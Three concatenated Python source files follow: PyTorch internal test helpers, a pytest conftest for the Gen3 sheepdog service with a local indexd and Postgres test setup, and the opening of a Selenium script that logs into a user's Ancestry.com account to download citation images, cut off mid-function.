values *= torch.tensor([-float(i - j)**2 for i, j in zip(*indices)], dtype=dtype, device=device).exp()
indices_tensor = torch.tensor(indices)
A = torch.sparse_coo_tensor(indices_tensor, values, (rows, columns), device=device)
return A.coalesce()
def random_sparse_pd_matrix(matrix_size, density=0.01, **kwargs):
"""Return random sparse positive-definite matrix with given density.
The eigenvalues of the matrix are defined as::
arange(1, matrix_size+1)/matrix_size
Algorithm:
A = diag(arange(1, matrix_size+1)/matrix_size)
while <A density is smaller than required>:
<choose random i, j in range(matrix_size), theta in [0, 2*pi]>
R = <rotation matrix (i,j,theta)>
A = R^T A R
"""
import math
torch = kwargs.get('torch', globals()['torch'])
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
data = dict([((i, i), float(i + 1) / matrix_size)
for i in range(matrix_size)])
def multiply(data, N, i, j, cs, sn, left=True):
for k in range(N):
if left:
ik, jk = (k, i), (k, j)
else:
ik, jk = (i, k), (j, k)
aik, ajk = data.get(ik, 0), data.get(jk, 0)
aik, ajk = cs * aik + sn * ajk, -sn * aik + cs * ajk
if aik:
data[ik] = aik
else:
data.pop(ik, None)
if ajk:
data[jk] = ajk
else:
data.pop(jk, None)
target_nnz = density * matrix_size * matrix_size
while len(data) < target_nnz:
i = random.randint(0, matrix_size - 1)
j = random.randint(0, matrix_size - 1)
if i != j:
theta = random.uniform(0, 2 * math.pi)
cs = math.cos(theta)
sn = math.sin(theta)
multiply(data, matrix_size, i, j, cs, sn, left=True)
multiply(data, matrix_size, i, j, cs, sn, left=False)
icoords, jcoords, values = [], [], []
for (i, j), v in sorted(data.items()):
icoords.append(i)
jcoords.append(j)
values.append(v)
indices_tensor = torch.tensor([icoords, jcoords])
return torch.sparse_coo_tensor(indices_tensor, values, (matrix_size, matrix_size), dtype=dtype, device=device)
def do_test_dtypes(self, dtypes, layout, device):
for dtype in dtypes:
if dtype != torch.float16:
out = torch.zeros((2, 3), dtype=dtype, layout=layout, device=device)
self.assertIs(dtype, out.dtype)
self.assertIs(layout, out.layout)
self.assertEqual(device, out.device)
def do_test_empty_full(self, dtypes, layout, device):
shape = torch.Size([2, 3])
def check_value(tensor, dtype, layout, device, value, requires_grad):
self.assertEqual(shape, tensor.shape)
self.assertIs(dtype, tensor.dtype)
self.assertIs(layout, tensor.layout)
self.assertEqual(tensor.requires_grad, requires_grad)
if tensor.is_cuda and device is not None:
self.assertEqual(device, tensor.device)
if value is not None:
fill = tensor.new(shape).fill_(value)
self.assertEqual(tensor, fill)
def get_int64_dtype(dtype):
module = '.'.join(str(dtype).split('.')[1:-1])
if not module:
return torch.int64
return operator.attrgetter(module)(torch).int64
default_dtype = torch.get_default_dtype()
check_value(torch.empty(shape), default_dtype, torch.strided, -1, None, False)
check_value(torch.full(shape, -5.), default_dtype, torch.strided, -1, None, False)
for dtype in dtypes:
for rg in {dtype.is_floating_point, False}:
int64_dtype = get_int64_dtype(dtype)
v = torch.empty(shape, dtype=dtype, device=device, layout=layout, requires_grad=rg)
check_value(v, dtype, layout, device, None, rg)
out = v.new()
check_value(torch.empty(shape, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, None, rg)
check_value(v.new_empty(shape), dtype, layout, device, None, False)
check_value(v.new_empty(shape, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
check_value(torch.empty_like(v), dtype, layout, device, None, False)
check_value(torch.empty_like(v, dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
if dtype is not torch.float16 and layout != torch.sparse_coo:
fv = 3
v = torch.full(shape, fv, dtype=dtype, layout=layout, device=device, requires_grad=rg)
check_value(v, dtype, layout, device, fv, rg)
check_value(v.new_full(shape, fv + 1), dtype, layout, device, fv + 1, False)
out = v.new()
check_value(torch.full(shape, fv + 2, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, fv + 2, rg)
check_value(v.new_full(shape, fv + 3, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 3, False)
check_value(torch.full_like(v, fv + 4), dtype, layout, device, fv + 4, False)
check_value(torch.full_like(v, fv + 5,
dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 5, False)
# this helper method is to recursively
# clone the tensor-type input of operators tested by OpInfo
def clone_input_helper(input):
if isinstance(input, torch.Tensor):
return torch.clone(input)
if isinstance(input, Sequence):
return tuple(map(clone_input_helper, input))
return input
THESE_TAKE_WAY_TOO_LONG = {
'test_Conv3d_groups',
'test_conv_double_backward',
'test_conv_double_backward_groups',
'test_Conv3d_dilated',
'test_Conv3d_stride_padding',
'test_Conv3d_dilated_strided',
'test_Conv3d',
'test_Conv2d_dilated',
'test_ConvTranspose3d_dilated',
'test_ConvTranspose2d_dilated',
'test_snli',
'test_Conv2d',
'test_Conv2d_padding',
'test_ConvTranspose2d_no_bias',
'test_ConvTranspose2d',
'test_ConvTranspose3d',
'test_Conv2d_no_bias',
'test_matmul_4d_4d',
'test_multinomial_invalid_probs',
}
running_script_path = None
def set_running_script_path():
global running_script_path
try:
running_file = os.path.abspath(os.path.realpath(sys.argv[0]))
if running_file.endswith('.py'): # skip if the running file is not a script
running_script_path = running_file
except Exception:
pass
def check_test_defined_in_running_script(test_case):
if running_script_path is None:
return
test_case_class_file = os.path.abspath(os.path.realpath(inspect.getfile(test_case.__class__)))
assert test_case_class_file == running_script_path, "Class of loaded TestCase \"{}\" " \
"is not defined in the running script \"{}\", but in \"{}\". Did you " \
"accidentally import a unittest.TestCase from another file?".format(
test_case.id(), running_script_path, test_case_class_file)
def load_tests(loader, tests, pattern):
set_running_script_path()
test_suite = unittest.TestSuite()
for test_group in tests:
for test in test_group:
check_test_defined_in_running_script(test)
test_suite.addTest(test)
return test_suite
class BytesIOContext(io.BytesIO):
def __enter__(self):
return self
def __exit__(self, *args):
pass
# Tentative value for nondet_tol for gradcheck when backward implementation
# relies on nondeterministic operations, i.e., those listed here:
# https://pytorch.org/docs/stable/generated/torch.use_deterministic_algorithms.html
#
# For more information see https://github.com/pytorch/pytorch/issues/56202
GRADCHECK_NONDET_TOL = 1e-12
def gradcheck(fn, inputs, **kwargs):
# Wrapper around gradcheck that enables certain keys by default.
# Use this testing-internal gradcheck instead of autograd.gradcheck so that new features like vmap and
# forward-mode AD are tested by default. We create this wrapper because we'd like to keep new checks
# to be disabled to default for the public-facing api to avoid breaking user code.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradcheck.
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "0FF") == "ON":
default_values["fast_mode"] = False
for key, value in default_values.items():
# default value override values explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradcheck(fn, inputs, **kwargs)
def gradgradcheck(fn, inputs, grad_outputs=None, **kwargs):
# Wrapper around gradgradcheck that enables certain keys by default
# See gradcheck above for an explanation of why we need something like this.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradgradcheck
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "0FF") == "ON":
default_values["fast_mode"] = False
for key, value in default_values.items():
# default value override values explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradgradcheck(fn, inputs, grad_outputs, **kwargs)
def _assertGradAndGradgradChecks(test_case, apply_fn, inputs, **kwargs):
# call assert function rather than returning a bool since it's nicer
# if we get whether this failed on the gradcheck or the gradgradcheck.
test_case.assertTrue(gradcheck(apply_fn, inputs, **kwargs))
test_case.assertTrue(gradgradcheck(apply_fn, inputs, **kwargs))
@contextmanager
def set_cwd(path: str) -> Iterator[None]:
old_cwd = os.getcwd()
try:
os.chdir(path)
yield
finally:
os.chdir(old_cwd)
# Using @precisionOverride specific to your test is the recommended way
# of doing this. These are just some values that worked for test_nn.
dtype2prec_DONTUSE = {torch.float: 1e-5,
torch.double: 1e-5,
torch.half: 1e-2,
torch.bfloat16: 1e-1}
def _wrap_warn_once(regex):
def decorator(fn):
def inner(self, *args, **kwargs):
with self.assertWarnsOnceRegex(UserWarning, regex):
fn(self, *args, **kwargs)
return inner
return decorator
# This is a wrapper that wraps a test to run this test twice, one with
# coalesced=True, another with coalesced=False for coalesced/uncoalesced sparse tensors.
def coalescedonoff(f):
@wraps(f)
def wrapped(self, *args, **kwargs):
f(self, *args, **kwargs, coalesced=True)
f(self, *args, **kwargs, coalesced=False)
return wrapped
@contextlib.contextmanager
def disable_gc():
if gc.isenabled():
try:
gc.disable()
yield
finally:
gc.enable()
else:
yield
def find_library_location(lib_name: str) -> Path:
# return the shared library file in the installed folder if exist,
# else the file in the build folder
torch_root = Path(torch.__file__).resolve().parent
path = torch_root / 'lib' / lib_name
if os.path.exists(path):
return path
torch_root = Path(__file__).resolve().parent.parent.parent
return torch_root / 'build' / 'lib' / lib_name
def sandcastle_skip(reason):
"""
Similar to unittest.skip, however in the sandcastle environment it just
"passes" the test instead to avoid creating tasks complaining about tests
skipping continuously.
"""
def decorator(func):
if not IS_SANDCASTLE:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
@wraps(func)
def wrapper(*args, **kwargs):
print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
return
return wrapper
return decorator
def mock_wrapper(method):
"""
Returns a function that calls the real implementation of a method
in addition to passing args to a mock object.
"""
mock = MagicMock()
@wraps(method)
def wrapper(self, *args, **kwargs):
mock(*args, **kwargs)
return method(self, *args, **kwargs)
wrapper.mock = mock # type: ignore[attr-defined]
return wrapper
def get_tensors_from(args, kwargs):
""" Returns a set of all Tensor objects in the given args and kwargs. """
return set([arg for arg in args if isinstance(arg, Tensor)] +
[v for v in kwargs.values() if isinstance(v, Tensor)])
# Returns scalar tensor representation of a list of integer byte values
def bytes_to_scalar(byte_list: List[int], dtype: torch.dtype, device: torch.device):
dtype_to_ctype: Dict[torch.dtype, Any] = {
torch.int8: ctypes.c_int8,
torch.uint8: ctypes.c_uint8,
torch.int16: ctypes.c_int16,
torch.int32: ctypes.c_int32,
torch.int64: ctypes.c_int64,
torch.bool: ctypes.c_bool,
torch.float32: ctypes.c_float,
torch.complex64: ctypes.c_float,
torch.float64: ctypes.c_double,
torch.complex128: ctypes.c_double,
}
ctype = dtype_to_ctype[dtype]
num_bytes = ctypes.sizeof(ctype)
def check_bytes(byte_list):
for byte in byte_list:
assert 0 <= byte <= 255
if dtype.is_complex:
assert len(byte_list) == (num_bytes * 2)
check_bytes(byte_list)
real = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list[:num_bytes])).value
imag = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list[num_bytes:])).value
res = real + 1j * imag
else:
assert len(byte_list) == num_bytes
check_bytes(byte_list)
res = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list)).value
return torch.tensor(res, device=device, dtype=dtype)
def has_breakpad():
# We always build with breakpad in CI
if IS_IN_CI:
return True
# If not on a special build, check that the library was actually linked in
try:
torch._C._get_minidump_directory() # type: ignore[attr-defined]
return True
except RuntimeError as e:
if "Minidump handler is uninintialized" in str(e):
return True
return False
def sandcastle_skip_if(condition, reason):
"""
Similar to unittest.skipIf, however in the sandcastle environment it just
"passes" the test instead to avoid creating tasks complaining about tests
skipping continuously.
"""
def decorator(func):
if not IS_SANDCASTLE and condition:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
@wraps(func)
def wrapper(*args, **kwargs):
if condition and IS_SANDCASTLE:
print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
return
else:
return func(*args, **kwargs)
return wrapper
return decorator
def dtype_name(dtype):
""" Returns the pretty name of the dtype (e.g. torch.int64 -> int64). """
return str(dtype).split('.')[1]
def set_single_threaded_if_parallel_tbb(fn):
"""Set test to be single threaded for parallel tbb.
See https://github.com/pytorch/pytorch/issues/64571#issuecomment-914691883
"""
if not IS_TBB:
return fn
@wraps(fn)
def wrap_fn(*args, **kwargs):
num_threads = torch.get_num_threads()
torch.set_num_threads(1)
try:
return fn(*args, **kwargs)
finally:
torch.set_num_threads(num_threads)
return wrap_fn
@functools.lru_cache()
def get_cycles_per_ms() -> float:
"""Measure and return approximate number of cycles per millisecond for torch.cuda._sleep
"""
def measure() -> float:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
cycles_per_ms = 1000000 / start.elapsed_time(end)
return cycles_per_ms
# Get 10 values and remove the 2 max and 2 min and return the avg.
# This is to avoid system disturbance that skew the results, e.g.
# the very first cuda call likely does a bunch of init, which takes
# much longer than subsequent calls.
#
# Tested on both Tesla V100, Quadro GP100, Titan RTX, RTX 3090 GPUs
# and seems to return stable values. Therefore, we enable caching
# using lru_cache decorator above.
num = 10
vals = []
for _ in range(num):
vals.append(measure())
vals = sorted(vals)
return mean(vals[2 : num - 2])
T = TypeVar('T')
def first_sample(self: unittest.TestCase, samples: Iterable[T]) -> T:
"""
Returns the first sample from an iterable of samples, like those returned by OpInfo.
The test will be skipped if no samples are available.
"""
try:
return next(iter(samples))
except StopIteration:
raise unittest.SkipTest('Skipped! Need at least 1 sample input')
|
conftest.py
|
import os
import json
import importlib
from multiprocessing import Process
from indexd import default_settings, get_app as get_indexd_app
from indexclient.client import IndexClient
import pytest
import requests
import requests_mock
from mock import patch
from psqlgraph import PsqlGraphDriver
from dictionaryutils import DataDictionary, dictionary
from datamodelutils import models, validators
from gen3authz.client.arborist.client import ArboristClient
from sheepdog.test_settings import INDEX_CLIENT
from tests.integration.datadictwithobjid.api import app as _app, app_init, indexd_init
from tests.integration.datadictwithobjid.submission.test_endpoints import put_cgci_blgsp
from tests import utils
def get_parent(path):
print(path)
return path[0 : path.rfind("/")]
PATH_TO_SCHEMA_DIR = (
get_parent(os.path.abspath(os.path.join(os.path.realpath(__file__), os.pardir)))
+ "/datadictwithobjid/schemas"
)
# update these settings if you want to point to another db
def pg_config(use_ssl=False, isolation_level=None):
test_host = (
"localhost:" + str(os.environ.get("PGPORT"))
if os.environ.get("PGPORT") is not None
else "localhost"
)
test_user = "test"
test_pass = "test" # nosec
test_db = "sheepdog_automated_test"
ret_val = dict(host=test_host, user=test_user, password=test_pass, database=test_db)
# set sslmode if it's given, otherwise use the default
if use_ssl:
connect_args = {}
connect_args["sslmode"] = "require"
ret_val["connect_args"] = connect_args
# set isolation_level if it's given, otherwise use the default
if isolation_level:
ret_val["isolation_level"] = isolation_level
return ret_val
@pytest.fixture
def require_index_exists_on(app, monkeypatch):
monkeypatch.setitem(app.config, "REQUIRE_FILE_INDEX_EXISTS", True)
@pytest.fixture
def require_index_exists_off(app, monkeypatch):
monkeypatch.setitem(app.config, "REQUIRE_FILE_INDEX_EXISTS", False)
def wait_for_indexd_alive(port):
url = "http://localhost:{}/_status".format(port)
try:
requests.get(url)
except requests.ConnectionError:
return wait_for_indexd_alive(port)
else:
return
def wait_for_indexd_not_alive(port):
url = "http://localhost:{}/_status".format(port)
try:
requests.get(url)
except requests.ConnectionError:
return
else:
return wait_for_indexd_not_alive(port)
@pytest.fixture
def app(tmpdir, request):
port = 8000
dictionary_setup(_app)
# this is to make sure sqlite is initialized
# for every unit test
importlib.reload(default_settings)
# fresh files before running
for filename in ["auth.sq3", "index.sq3", "alias.sq3"]:
if os.path.exists(filename):
os.remove(filename)
indexd_app = get_indexd_app()
indexd_init(*INDEX_CLIENT["auth"])
indexd = Process(target=indexd_app.run, args=["localhost", port])
indexd.start()
wait_for_indexd_alive(port)
gencode_json = tmpdir.mkdir("slicing").join("test_gencode.json")
gencode_json.write(
json.dumps(
{
"a_gene": ["chr1", None, 200],
"b_gene": ["chr1", 150, 300],
"c_gene": ["chr1", 200, None],
"d_gene": ["chr1", None, None],
}
)
)
def teardown():
for filename in ["auth.sq3", "index.sq3", "alias.sq3"]:
if os.path.exists(filename):
os.remove(filename)
indexd.terminate()
wait_for_indexd_not_alive(port)
_app.config.from_object("sheepdog.test_settings")
_app.config["PATH_TO_SCHEMA_DIR"] = PATH_TO_SCHEMA_DIR
request.addfinalizer(teardown)
app_init(_app)
_app.logger.setLevel(os.environ.get("GDC_LOG_LEVEL", "WARNING"))
_app.jwt_public_keys = {
_app.config["USER_API"]: {
"key-test": utils.read_file(
"./integration/resources/keys/test_public_key.pem"
)
}
}
_app.auth = ArboristClient()
return _app
@pytest.fixture(params=[None, False, True])
def use_ssl(request):
# return None, False, True
return request.param
@pytest.fixture(params=("READ_COMMITTED", "REPEATABLE_READ", "SERIALIZABLE", None))
def isolation_level(request):
# return 'READ_COMMITTED', 'REPEATABLE_READ', 'SERIALIZABLE', None
return request.param
@pytest.fixture
def pg_driver(request, client, use_ssl, isolation_level):
pg_driver = PsqlGraphDriver(
**pg_config(use_ssl=use_ssl, isolation_level=isolation_level)
)
def tearDown():
with pg_driver.engine.begin() as conn:
for table in models.Node().get_subclass_table_names():
if table != models.Node.__tablename__:
conn.execute("delete from {}".format(table)) # nosec
for table in models.Edge().get_subclass_table_names():
if table != models.Edge.__tablename__:
conn.execute("delete from {}".format(table)) # nosec
conn.execute("delete from versioned_nodes")
conn.execute("delete from _voided_nodes")
conn.execute("delete from _voided_edges")
conn.execute("delete from transaction_snapshots")
conn.execute("delete from transaction_documents")
conn.execute("delete from transaction_logs")
tearDown()
request.addfinalizer(tearDown)
return pg_driver
@pytest.fixture()
def cgci_blgsp(client, submitter):
put_cgci_blgsp(client, submitter)
@pytest.fixture()
def index_client():
return IndexClient(
INDEX_CLIENT["host"], INDEX_CLIENT["version"], INDEX_CLIENT["auth"]
)
def dictionary_setup(_app):
url = "s3://testurl"
session = requests.Session()
adapter = requests_mock.Adapter()
session.mount("s3", adapter)
json_dict = json.load(open(PATH_TO_SCHEMA_DIR + "/dictionary.json"))
adapter.register_uri("GET", url, json=json_dict, status_code=200)
resp = session.get(url)
with patch("requests.get") as get_mocked:
get_mocked.return_value = resp
datadictionary = DataDictionary(url=url)
dictionary.init(datadictionary)
from gdcdatamodel import models as md
from gdcdatamodel import validators as vd
models.init(md)
validators.init(vd)
|
ancestry_extract.py
|
#!/usr/bin/env python3
"""
##############################################################################
# Copyright 2019-2020 Christopher Horn
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
"""
import argparse
import atexit
import filecmp
import hashlib
import json
import logging
import os
import sys
import time
from multiprocessing import Process, Queue
from signal import SIGABRT, SIGTERM, signal
import filetype
import pathvalidate
import pendulum
import requests
import toml
from bs4 import BeautifulSoup
from selenium.common.exceptions import WebDriverException
from selenium.webdriver import Firefox, FirefoxProfile
from selenium.webdriver.firefox.options import Options
_SIGNAL_EXIT = False
def clean_exit():
"""
Exits cleanly
"""
global _SIGNAL_EXIT
_SIGNAL_EXIT = True
sys.exit(0)
def session_cleanup(session):
"""
Perform clean session shutdown saving current state
"""
logging.info("Starting application shutdown")
try:
state = {
"checkpoint": session.checkpoint,
"tree_id": session.tree_id,
"tree_name": session.tree_name,
"unavailable": session.unavailable,
}
with open(session.options.output + "/metadata/state.toml", "w") as state_file:
state_file.write(toml.dumps(state))
state_file.flush()
except:
pass
logging.info("Cleaning up session and closing browser if active")
logging.getLogger().setLevel(logging.CRITICAL)
if _SIGNAL_EXIT:
try:
session.save_screenshot("ancestryAbortImage.png")
except:
logging.critical("Failed to save abort screen shot")
try:
session.quit()
except:
pass
logging.getLogger().setLevel(logging.INFO)
def load_tables(queue, path):
"""
Load image hash and identifier caches
"""
checkpoint = 0
unavailable = []
tree_id = tree_name = ""
hash_map = {}
logging.info("Checking for hashes to seed image hash cache")
for dir_name in ["apid", "guid"]:
for fs_entry in os.scandir("{0}/metadata/{1}".format(path, dir_name)):
if fs_entry.is_file() and ".toml" in fs_entry.name:
with open(fs_entry.path, "r") as meta_file:
metadata = toml.load(meta_file)
if "hash" in metadata and "image" in metadata:
hash_map.update({metadata["hash"]: metadata["image"]})
if "clip_hash" in metadata and "clipping" in metadata:
hash_map.update({metadata["clip_hash"]: metadata["clipping"]})
state_file = "{0}/metadata/state.toml".format(path)
if os.path.isfile(state_file):
with open(state_file, "r") as meta_file:
metadata = toml.load(meta_file)
if "checkpoint" in metadata:
checkpoint = metadata["checkpoint"]
if "tree_id" in metadata:
tree_id = metadata["tree_id"]
if "tree_name" in metadata:
tree_name = metadata["tree_name"]
if "unavailable" in metadata:
unavailable = metadata["unavailable"]
if hash_map != {}:
logging.info("Loaded %d image hashes", len(hash_map))
else:
logging.info("No hashes found to preseed cache")
image_cache = {}
logging.info("Checking for images to seed image identifier cache")
for fs_object in os.scandir("{0}/media/dbid".format(path)):
if fs_object.is_dir():
for fs_entry in os.scandir(fs_object.path):
if fs_entry.is_file():
dbid = fs_object.name
extension = fs_entry.name.split(".").pop(-1)
iid = fs_entry.name.replace("." + extension, "")
image_cache.update({"{0}_{1}".format(dbid, iid): fs_entry.path})
if image_cache != []:
logging.info("Loaded %d image identifiers", len(image_cache))
else:
logging.info("No images found to preseed cache")
result = {
"checkpoint": checkpoint,
"tree_id": tree_id,
"tree_name": tree_name,
"unavailable": unavailable,
"hash_map": hash_map,
"image_cache": image_cache,
}
queue.put(result)
def load_gedcom(queue, gedcom_data):
"""
First pass load for gedcom data
"""
people = {}
person = ""
families = 0
apids = []
guids = []
apid_total = guid_total = 0
logging.info("Performing first pass Gedcom analysis")
for line in gedcom_data.split("\n"):
if len(line) < 6:
continue
tag = line.split(" ")[1]
if "@P" in tag:
person = tag
continue
if tag == "NAME" and person != "":
people.update({person: line[7:]})
continue
if "@F" in tag:
families = families + 1
continue
if tag == "_APID":
apid_total = apid_total + 1
apid = line.split(" ")[2]
if apid not in apids:
apids.append(apid)
continue
if tag == "FILE" and "http" in line:
guid_total = guid_total + 1
url = line.split(" ").pop(2).strip()
guid = url.split("&").pop(1)[5:]
if guid not in guids:
guids.append(guid)
result = {
"people": people,
"families": families,
"apid_total": apid_total,
"apid_unique": len(apids),
"guid_total": guid_total,
"guid_unique": len(guids),
}
queue.put(result)
def wait_for_text(session, text, timeout):
"""
Poll until expected text appears in an asynchronously loading page
"""
count = 0
limit = timeout / 0.2
test_text = text.split("|")
while True:
for text in test_text:
if text == None:
return "unavailable"
if session.page_source == None:
return "unavailable"
if text in session.page_source:
return "ready"
if "this page is temporarily unavailable" in session.page_source:
return "unavailable"
if count > limit:
logging.error("Timeout waiting for object visibility")
return "timeout"
count = count + 1
time.sleep(0.2)
def login(session):
"""
Handle initial login process
"""
page = "{0}/secure/Login".format(session.options.ancestry)
logging.info("Loading page " + page)
try:
session.get(page)
except:
logging.error("Problem loading initial Ancestry.com login page")
session.save_screenshot("ancestryFailedConnectImage.png")
sys.exit(1)
if 'id="signInCustLink"' in session.page_source:
logging.info("Found sign in screen, clicking link to sign in")
sign_in = session.find_element_by_id("signInCustLink")
sign_in.click()
session.switch_to.default_content()
result = wait_for_text(session, 'id="usernameLabel"', 10)
if result != "ready":
logging.error("Login page did not come up after clicking sign in")
session.save_screenshot("ancestryFailedSignInClick.png")
sys.exit(1)
if 'id="signInFrame"' in session.page_source:
iframe = session.find_element_by_id("signInFrame")
session.switch_to.frame(iframe)
if 'id="usernameLabel"' in session.page_source:
logging.info("Attempting login as %s", session.options.account)
submit_id = "signInBtn"
user_id = "username"
pass_id = "password"
if 'id="usernameHOM"' in session.page_source:
submit_id = "signinHOM"
user_id = "usernameHOM"
pass_id = "passwordHOM"
if submit_id not in session.page_source:
logging.error("Can not find submit button to login")
session.save_screenshot("ancestryMissingLoginSubmit.png")
sys.exit(1)
account_field = session.find_element_by_id(user_id)
account_field.clear()
account_field.send_keys(session.options.account)
password_field = session.find_element_by_id(pass_id)
password_field.clear()
password_field.send_keys(session.options.password)
submit_button = session.find_element_by_id(submit_id)
submit_button.click()
session.switch_to.default_content()
count = 0
logged_in = False
while count < 100:
try:
if "About this tree" in session.page_source:
logged_in = True
break
if "Products and Services" in session.page_source:
logged_in = True
break
if "Invalid credentials" in session.page_source:
logging.error("Login failed, invalid credentials supplied")
session.save_screenshot("ancestryFailedLoginImage.png")
sys.exit(1)
except:
pass
count = count + 1
time.sleep(0.2)
if not logged_in:
logging.error("Login failed, home page did not appear to load")
session.save_screenshot("ancestryFailedLoginImage.png")
sys.exit(1)
logging.info("Successfully logged in")
def compare_files(file1, file2):
"""
Compare 2 files, separated out as a function to allow for different methods for file types
"""
if file1[-3:] == "pdf" or file2[-3:] == "pdf":
# PDF hashes change in unpredictable ways.
# There are some tools that convert pdfs to images and then compare them
# but they add a lot of overhead and could be more difficult to setup.
# This works well enough for now.
# If the file sizes are within a few bytes and they have the same name
return abs(int(os.stat(file1).st_size) - int(os.stat(file2).st_size)) < 8
else:
return filecmp.cmp(file1, file2)
def get_image(session, url, target_name):
"""
Download and validate not a duplicate image
"""
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 "
+ "(KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
}
target_name = pathvalidate.sanitize_filepath(target_name)
download_name = "{0}/download.data".format(os.path.dirname(target_name))
if os.path.isfile(download_name):
logging.debug("Found and removing old %s", download_name)
os.remove(download_name)
logging.info("Downloading image at %s", url)
download_session = requests.session()
download_session.headers.update(headers)
for cookie in session.get_cookies():
download_session.cookies.update({cookie["name"]: cookie["value"]})
try:
file_data = download_session.get(url, allow_redirects=True)
logging.debug(download_name)
path, filename = os.path.split(download_name)
os.makedirs(path, exist_ok=True)
with open(download_name, "wb") as image_file:
image_file.write(file_data.content)
except:
logging.error("Error downloading file, retrying")
time.sleep(1)
file_data = download_session.get(url, allow_redirects=True)
with open(download_name, "wb") as image_file:
image_file.write(file_data.content)
file_type = filetype.guess(file_data.content)
if not file_type:
if b"this page is lost or can" in file_data.content:
logging.error(
"Newspapers.com Intermittent Failure, Flagged as unavailable: {}".format(
url
)
)
else:
logging.error("No file returned. Flagged as unavailable: {}".format(url))
return None, None, False
hash_data = hashlib.sha256()
hash_data.update(file_data.content)
file_hash = hash_data.hexdigest()
del hash_data
del file_data
del download_session
if file_hash in session.hash_map:
if os.path.isfile(session.hash_map[file_hash]):
if compare_files(download_name, session.hash_map[file_hash]):
logging.info(
"Downloaded image identical to %s", session.hash_map[file_hash]
)
os.remove(download_name)
return session.hash_map[file_hash], file_hash, True
logging.critical(
"Downloaded image hash identical to %s", session.hash_map[file_hash]
)
logging.critical(
"A binary file compare differs! You should play the lottery!"
)
logging.critical("Processing aborted as no clue what to do...")
sys.exit(1)
loop = 1
file_name = "{0}.{1}".format(target_name, file_type.extension)
while os.path.isfile(file_name):
logging.debug("Found existing %s", file_name)
if compare_files(download_name, file_name):
logging.info("Downloaded image identical to %s", file_name)
os.remove(download_name)
return file_name, file_hash, False
file_name = "{0}-{1}.{2}".format(target_name, loop, file_type.extension)
loop = loop + 1
os.replace(download_name, file_name)
logging.info("Resulting image named %s", os.path.basename(file_name))
session.hash_map.update({file_hash: file_name})
return file_name, file_hash, False
def get_screenshot(session, target_name):
"""
Take element screenshot
"""
# Some names from Ancestry can include characters that don't play well with the file system
target_name = pathvalidate.sanitize_filepath(target_name)
if os.path.isfile(target_name):
logging.info("Found existing screenshot of the source citation page")
return target_name
logging.info("Taking screenshot of the source citation page")
element = session.find_element_by_class_name("article.ancCol.w66")
element.screenshot(target_name)
return target_name
def get_citation_media(session, line):
"""
Process a source citation page identified by an _APID record
"""
apid = line.split(" ").pop(2).strip()
indiv = apid.split(",").pop(0)
dbid = apid.split(",").pop(1).split(":").pop(0)
dbrecord = apid.split(":").pop(2)
apid_meta_file = "{0}/metadata/apid/apid_{1}_{2}_{3}.toml".format(
session.options.output, indiv, dbid, dbrecord
)
if os.path.isfile(apid_meta_file):
process_data = False
try:
with open(apid_meta_file, "r") as meta_file:
metadata = toml.load(meta_file)
if "image" in metadata:
if not os.path.isfile(metadata["image"]):
process_data = True
if session.options.screenshots and metadata["type"] != "rawimage":
if "screenshot" not in metadata:
process_data = True
elif not os.path.isfile(metadata["screenshot"]):
process_data = True
except:
process_data = True
if not process_data:
if session.line_number > session.checkpoint:
logging.debug("APID %s record already processed", apid)
return "duplicate"
logging.info(
"APID %s previously processed but image missing so reprocessing", apid
)
if apid in session.unavailable:
if session.line_number > session.checkpoint:
logging.debug("APID %s record duplicate of an unavailable one", apid)
return "skip"
logging.info("Processing APID %s", apid)
item_start_time = pendulum.now()
dbid_data = {"dbid": dbid}
apid_data = {"apid": apid}
apid_data.update(
{
"url": "https://search.ancestry.com/cgi-bin/sse.dll?indiv={0}&dbid={1}&h={2}".format(
indiv, dbid, dbrecord
)
}
)
logging.info("Fetching source citation page at %s", apid_data["url"])
session.get(apid_data["url"])
if session.current_url != apid_data["url"]:
source_type = "rawimage"
else:
result = wait_for_text(session, "personRecordSavedToText", 10)
if result != "ready":
logging.warning(
"Source citation page for APID %s unavailable or timed out", apid
)
if result == "unavailable":
session.unavailable = session.unavailable + [apid]
return result
if 'id="viewOriginal"' in session.page_source:
source_type = "image"
elif "Go to website" in session.page_source:
source_type = "url"
else:
source_type = "text"
logging.info("Source citation appears to be %s related", source_type)
apid_data.update({"type": source_type})
logging.info("Extracting cited facts and source information")
soup = BeautifulSoup(session.page_source, features="lxml")
